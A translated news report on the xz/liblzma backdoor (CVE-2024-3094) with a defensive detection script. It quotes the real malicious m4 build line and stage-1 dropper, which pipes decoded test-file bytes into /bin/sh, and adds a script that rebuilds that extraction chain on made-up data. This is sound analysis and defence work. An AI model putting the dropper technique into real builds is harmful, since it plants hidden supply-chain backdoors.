A backdoor allowing access to sshd has been found in the xz/liblzma library

In the XZ Utils package, which contains the liblzma library and the utilities for working with data compressed in the ".xz" format, a backdoor (CVE-2024-3094) has been identified that allows interception and modification of the data processed by applications linked against liblzma. The main target of the backdoor is the OpenSSH server, which in some distributions is linked with the libsystemd library, which in turn uses liblzma. Linking sshd with the compromised library lets attackers gain access to the SSH server without authentication.

The backdoor was present in the official 5.6.0 and 5.6.1 releases, published on February 24 and March 9, which made it into a number of distributions and repositories, for example Gentoo, Arch Linux, Debian sid/unstable, Fedora Rawhide and 40-beta, openSUSE factory and tumbleweed, LibreELEC, Alpine edge, Solus, NixOS unstable, OpenIndiana, OpenMandriva rolling, pkgsrc current, Slackware current and Manjaro testing. All users of xz 5.6.0 and 5.6.1 builds are advised to roll back to version 5.4.6 as soon as possible.

Among the mitigating factors, the backdoored liblzma did not reach the stable releases of the major distributions, although it did affect openSUSE Tumbleweed and Fedora 40-beta. Arch Linux and Gentoo shipped the compromised xz version but are not exposed to the attack, because they do not apply the systemd-notify patch to openssh that makes sshd link against liblzma. The backdoor only affects x86_64 systems running the Linux kernel with the glibc C library.
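The two conditions named above, a build from the backdoored 5.6.0/5.6.1 releases and an sshd that pulls liblzma in through libsystemd, can be checked on a host with a short script. The following is an added example, not code from the article or from the xz project: the parsing is kept in functions that take text, so the logic runs against the constructed ldd samples below, and live_check() feeds the same functions real output from xz, ldd and uname.

```shell
#!/bin/sh
# Added example, not code from the article or the xz project: a host check
# for a backdoored xz/liblzma build (5.6.0 or 5.6.1) combined with an sshd
# that loads liblzma (indirectly, through libsystemd). The samples below are
# constructed; live_check() uses real xz, ldd and uname output.
set -eu

# Constructed ldd output for the two cases the text contrasts: a distro whose
# sshd carries the systemd-notify patch (liblzma present) and one that does
# not (the Arch/Gentoo case).
SAMPLE_LDD_LINKED='    libsystemd.so.0 => /lib/x86_64-linux-gnu/libsystemd.so.0 (0x00007f2a1c000000)
    liblzma.so.5 => /lib/x86_64-linux-gnu/liblzma.so.5 (0x00007f2a1bfc0000)
    libc.so.6 => /lib/x86_64-linux-gnu/libc.so.6 (0x00007f2a1bd00000)'
SAMPLE_LDD_CLEAN='    libcrypto.so.3 => /usr/lib/libcrypto.so.3 (0x00007f2a1c000000)
    libc.so.6 => /usr/lib/libc.so.6 (0x00007f2a1bd00000)'

# Takes a line such as "xz (XZ Utils) 5.6.1" or "liblzma 5.6.1" and keys on
# its last token; returns 0 for the two backdoored releases, 1 otherwise.
is_backdoored_version() {
  case "${1##* }" in
    5.6.0|5.6.1) return 0 ;;
    *) return 1 ;;
  esac
}

# Prints the liblzma path that ldd resolved for sshd, or returns 1 when sshd
# does not load liblzma at all.
sshd_liblzma_path() {
  printf '%s\n' "$1" | grep liblzma | grep -o '/[^ ]*' | head -n 1 | grep .
}

# Per the text, only x86_64 Linux builds carry the active backdoor.
is_affected_platform() { [ "$1" = x86_64 ] && [ "$2" = Linux ]; }

# One verdict: returns 0 (and says so) only when a backdoored build is
# reachable from sshd; every other case returns 1 with a short reason.
assess() { # assess XZ_VERSION_LINE LDD_OUTPUT UNAME_M UNAME_S
  if [ -z "$1" ]; then
    echo "xz not found on this host"; return 1
  fi
  if ! is_backdoored_version "$1"; then
    echo "xz is not 5.6.0/5.6.1: not affected"; return 1
  fi
  if ! is_affected_platform "$3" "$4"; then
    echo "backdoored xz present but not x86_64 Linux: downgrade to 5.4.6 anyway"; return 1
  fi
  if lz=$(sshd_liblzma_path "$2"); then
    echo "EXPOSED: sshd loads $lz from a backdoored xz build; downgrade to 5.4.6 now"; return 0
  fi
  echo "backdoored xz present but sshd does not load liblzma: downgrade to 5.4.6 anyway"; return 1
}

# Live variant. ldd runs the binary's dynamic loader, so run this from an
# interactive shell: the article notes the backdoor stays dormant when TERM
# is set.
live_check() {
  xzline=$(xz --version 2>/dev/null | head -n 1 || true)
  sshd=$(command -v sshd || echo /usr/sbin/sshd)
  lddout=$(ldd "$sshd" 2>/dev/null || true)
  assess "$xzline" "$lddout" "$(uname -m)" "$(uname -s)"
}

case "${1:-}" in --live) live_check ;; esac
```

Run it as `sh check.sh --live`; the exit status is 0 only for the exposed case. Note that a "not affected" verdict from the ldd check only covers the sshd vector: any other application linked against a 5.6.x liblzma still needs the downgrade.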

The code implementing the backdoor was hidden in m4 macros from the build-to-host.m4 file used by the automake toolkit during the build. During the build, a sequence of complex obfuscated operations based on the archives bad-3-corrupt_lzma2.xz and good-large_compressed.lzma, ostensibly test vectors used to verify correct operation, produced an object file containing malicious code, which was linked into the liblzma library and changed the logic of some of its functions. The m4 macros that activate the backdoor were included in the release tarballs but were absent from the Git repository. At the same time, the malicious test archives were present in the repository, i.e. the person who planted the backdoor had access both to the repository and to the release generation process.

For applications that use liblzma, the malicious changes could be used to intercept or modify data, or to interfere with the operation of sshd. In particular, the malicious code hooked the RSA_public_decrypt function in order to bypass sshd authentication. The backdoor included anti-detection measures: it stayed dormant when the TERM environment variable was set (i.e. when the process was started from a terminal) or when the LD_DEBUG or LD_PROFILE environment variables were set, it required LANG to be set, and it activated only when the running executable was /usr/sbin/sshd. The backdoor also carried a mechanism for detecting execution under a debugger.

Specifically, the m4/build-to-host.m4 file contained the following:

    gl_am_configmake=`grep -aErls "#{4}[[:alnum:]]{5}#{4}$" $srcdir/ 2>/dev/null`
    …
    gl_[$1]_config='sed \"r\n\" $gl_am_configmake | eval $gl_path_map | $gl_[$1]_prefix -d 2>/dev/null'

At the first stage, the grep invocation found the file tests/files/bad-3-corrupt_lzma2.xz which, once unpacked, yielded the following script:

    ####Hello####
    #345U211267$^D330^W
    [ ! $(uname) = "Linux" ] && exit 0
    [ ! $(uname) = "Linux" ] && exit 0
    [ ! $(uname) = "Linux" ] && exit 0
    [ ! $(uname) = "Linux" ] && exit 0
    [ ! $(uname) = "Linux" ] && exit 0
    eval `grep ^srcdir= config.status`
    if test -f ../../config.status;then
    eval `grep ^srcdir= ../../config.status`
    srcdir="../../$srcdir"
    fi
    export i="((head -c +1024 >/dev/null) && head -c +2048 && (head -c +1024 >/dev/null) && head -c +2048 && (head -c +1024 >/dev/null) && head -c +2048 && (head -c +1024 >/dev/null) && head -c +2048 && (head -c +1024 >/dev/null) && head -c +2048 && (head -c +1024 >/dev/null) && head -c +2048 && (head -c +1024 >/dev/null) && head -c +2048 && (head -c +1024 >/dev/null) && head -c +2048 && (head -c +1024 >/dev/null) && head -c +2048 && (head -c +1024 >/dev/null) && head -c +2048 && (head -c +1024 >/dev/null) && head -c +2048 && (head -c +1024 >/dev/null) && head -c +2048 && (head -c +1024 >/dev/null) && head -c +2048 && (head -c +1024 >/dev/null) && head -c +2048 && (head -c +1024 >/dev/null) && head -c +2048 && (head -c +1024 >/dev/null) && head -c +2048 && (head -c +1024 >/dev/null) && head -c +939)";(xz -dc $srcdir/tests/files/good-large_compressed.lzma|eval $i|tail -c +31233|tr "\114-\321\322-\377\35-\47\14-\34\0-\13\50-\113" "\0-\377")|xz -F raw --lzma1 -dc|/bin/sh
    ####World####
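The m4 fragment and the stage-1 script above rely on three mechanisms: a grep that locates the carrier file by a marker line, a chain of head calls that carves byte windows out of a stream, and a tr call that undoes a 256-byte permutation. The script below is an added example, not code from the xz release, its attacker or the article: it rebuilds those three steps on constructed data so the extraction pipeline can be run offline. The marker, the payload text and the filler bytes are made up, the carving counts (16/32/2) are shrunk from the dropper's 1024/2048/16, and the final "xz -F raw --lzma1 -dc" decompression of the real dropper is left out.

```shell
#!/bin/sh
# Added example, not code from xz, its attacker or the article: rebuilds the
# locator, carver and byte-permutation steps of the stage-1 dropper on
# constructed data. Counts are shrunk from 1024/2048/16 to 16/32/2.
set -eu
export LC_ALL=C   # byte-oriented grep/tr regardless of the caller's locale

# The tr set from the dropper. Its second set is the identity range \0-\377,
# so the dropper's tr is a full permutation of byte values and the inverse
# is simply tr with the two sets swapped.
PERM='\114-\321\322-\377\35-\47\14-\34\0-\13\50-\113'
encode_payload() { tr '\0-\377' "$PERM"; }   # what the attacker applied
decode_payload() { tr "$PERM" '\0-\377'; }   # what the dropper applies

# Locator: the regex from build-to-host.m4 run over a directory; prints the
# path of every file containing a line like ####Hello####.
find_carrier() { grep -aErls '#{4}[[:alnum:]]{5}#{4}$' "$1"; }

# Carver: mimics $i. Skip S bytes, keep K bytes, R times over, then skip S
# and keep up to F bytes. This works because GNU head -c reads exactly the
# requested count from a pipe and leaves the rest for the next command,
# which is the property the original one-liner depends on.
carve() { # carve S K R F
  r=0
  while [ "$r" -lt "$3" ]; do
    head -c "$1" >/dev/null
    head -c "$2"
    r=$((r + 1))
  done
  head -c "$1" >/dev/null
  head -c "$4"
}

filler() { head -c "$1" /dev/zero | tr '\0' 'J'; }   # constructed junk bytes

# Constructed stand-in for the hidden stream, long enough to span three
# carved windows.
PAYLOAD='echo "constructed stage-1 payload: stands in for the raw lzma1 stream the dropper fed to /bin/sh"'

# Attacker side: lay the encoded payload out so that "carve 16 32 2" recovers
# it. The first 16 bytes are the marker line plus two filler bytes.
build_carrier() { # build_carrier ENCODED_FILE > carrier
  printf '####Hello####\n'; filler 2
  head -c 32 "$1"
  filler 16; tail -c +33 "$1" | head -c 32
  filler 16; tail -c +65 "$1"
}

# Victim side: find the carrier the way the m4 macro does, carve it the way
# $i does, undo the permutation the way the dropper's tr does. cat forces a
# pipe so head sees a stream, as in the original.
extract_from() { # extract_from DIR
  carrier=$(find_carrier "$1")
  cat "$carrier" | carve 16 32 2 4096 | decode_payload
}

run_demo() { # prints the recovered payload
  dir=$(mktemp -d)
  printf 'innocent test vector\n' > "$dir/good.bin"   # decoy without marker
  printf '%s\n' "$PAYLOAD" | encode_payload > "$dir/enc"
  build_carrier "$dir/enc" > "$dir/bad-3-corrupt.bin"
  rm "$dir/enc"
  extract_from "$dir"
  rm -rf "$dir"
}

case "${1:-}" in --demo) run_demo ;; esac
```

Running `sh stage1.sh --demo` prints the payload text back out; in the real dropper that recovered stream went through one more xz decompression and then straight into /bin/sh. The point worth taking from the exercise is that nothing in the pipeline is cryptographic: the "test file" is a plain permuted container, and any build that greps its own test directory for marker lines and pipes the result into a shell is a supply-chain red flag in its own right.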

How the attackers managed to gain access to the xz project's infrastructure has not yet been fully clarified. It is also not yet clear how many users and projects were compromised as a result of the backdoor. The alleged author of the backdoor (JiaT75, Jia Tan), who added the archives with the malicious code to the repository, corresponded with Fedora developers and submitted pull requests to Debian related to moving the distributions to the xz 5.6.0 branch, and raised no suspicion, since he had been participating in xz development for the previous two years and is the second-largest contributor by number of changes. Besides the xz project, the alleged backdoor author also contributed to the xz-java and xz-embedded packages. Moreover, a few days earlier Jia Tan had been added to the list of maintainers of the XZ Embedded project used in the Linux kernel.

The malicious change was discovered while investigating excessive CPU consumption and errors reported by valgrind when connecting via ssh to Debian-based systems. Notably, the xz 5.6.1 release included changes prepared by the alleged backdoor author in response to complaints about sshd slowdowns and crashes that appeared after updating to the backdoored xz 5.6.0. In addition, last year Jia Tan made changes that were incompatible with the "-fsanitize=address" check mode, which caused that mode to be disabled during fuzz testing.

Source: opennet.ru
